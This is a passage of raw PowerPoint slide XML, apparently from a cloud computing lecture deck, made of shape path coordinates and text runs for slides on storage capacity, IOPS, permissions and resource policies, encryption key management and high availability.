                  <a:lnTo>
                    <a:pt x="2230247" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248789" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271852" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299068" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330119" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364638" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402268" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442680" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485517" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530437" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577084" y="748284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623718" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668638" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711475" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2751886" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789517" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824035" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855087" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882303" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2905366" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923908" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2937573" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946031" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2948940" y="374142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="5155692" y="1485138"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1438211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1393024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1349921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1309255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1271397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1236662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1205433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1178039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1154836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1136192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1122426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1113917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1110996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1113917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1122426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1136192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1154836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1178039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1205433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1236662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1271397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1309255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1349921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1393024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1438211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4411980" y="1485138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1532077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1577263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1620367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1661033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1698891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1733626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1764855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1792249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1815452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1834095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1847862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1856371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1859280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1856371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1847862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1834095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1815452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1792249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1764855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1733626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1698891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1661033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1620367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1577263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1532077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5155692" y="1485138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8005064" y="5127117"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>02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98946" y="6136894"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>01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210927" y="6237173"/>
            <a:ext cx="3429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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>03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42517" y="5370728"/>
            <a:ext cx="4461510" cy="1936750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370840">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95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95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>capacity</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000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2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Performance </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>characteristics </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="404040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5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dirty="0" sz="220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85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ge</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>iers</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000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2200" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Operations</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Per</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Second</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(IOPS)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50542" y="1756298"/>
            <a:ext cx="12553315" cy="2510155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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cloud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storage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security,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compute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component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refers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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>CPU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system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memory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resources.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="7620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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stor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ge</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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compo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ent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e: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800">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="535305">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Permissions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80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135" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90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65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>resource</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-70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55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>policies</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4026535" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="4025900" algn="l"/>
                <a:tab pos="4026535" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Notation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(JSON)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134090" y="5108050"/>
            <a:ext cx="4633595" cy="2320290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algn="ctr" marL="69850">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Encryption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37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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Symmetric</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>media</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="136525" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="114100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80">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>CSP-managed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>versus </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>customer- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-68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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>managed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>keys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1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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>epara</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040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404040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40">
                <a:solidFill>
                  <a:srgbClr val="404040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55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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0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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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110">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-570">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>managed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>keys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62419" y="306451"/>
            <a:ext cx="293116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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Availability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55691" y="760476"/>
            <a:ext cx="5943600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134867" y="2967227"/>
            <a:ext cx="1653539" cy="1275715"/>
            <a:chOff x="3134867" y="2967227"/>
            <a:chExt cx="1653539" cy="1275715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3134867" y="2967227"/>
              <a:ext cx="1653539" cy="779145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1653539" h="779145">
                  <a:moveTo>
                    <a:pt x="826007" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="775847" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726460" y="5643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677935" y="12574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630359" y="22135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583819" y="34244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538404" y="48818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494202" y="65775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451300" y="85033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409786" y="106510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369748" y="130124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331274" y="155792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294451" y="183431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259368" y="212961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226112" y="244298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194770" y="277361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165432" y="312067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138184" y="348334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113114" y="386079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90311" y="425222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69861" y="465678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51853" y="507366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36375" y="550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23514" y="594110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13358" y="639001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5995" y="684795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513" y="731410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318516" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320840" y="732772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327671" y="687986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338795" y="644610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354000" y="602849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373071" y="562906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395797" y="524985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421964" y="489291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451359" y="456028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483769" y="425400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518981" y="397610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556781" y="372864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596956" y="351365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639294" y="333317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683581" y="318924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729605" y="308391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777151" y="301921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="299720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874859" y="301921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922434" y="308391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968514" y="318924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012882" y="333317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055321" y="351365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095614" y="372864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133543" y="397610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168890" y="425400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201440" y="456028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230974" y="489291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1257275" y="524985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1280126" y="562906"/>
                  </a:lnTo>
                  <a:lnTo>
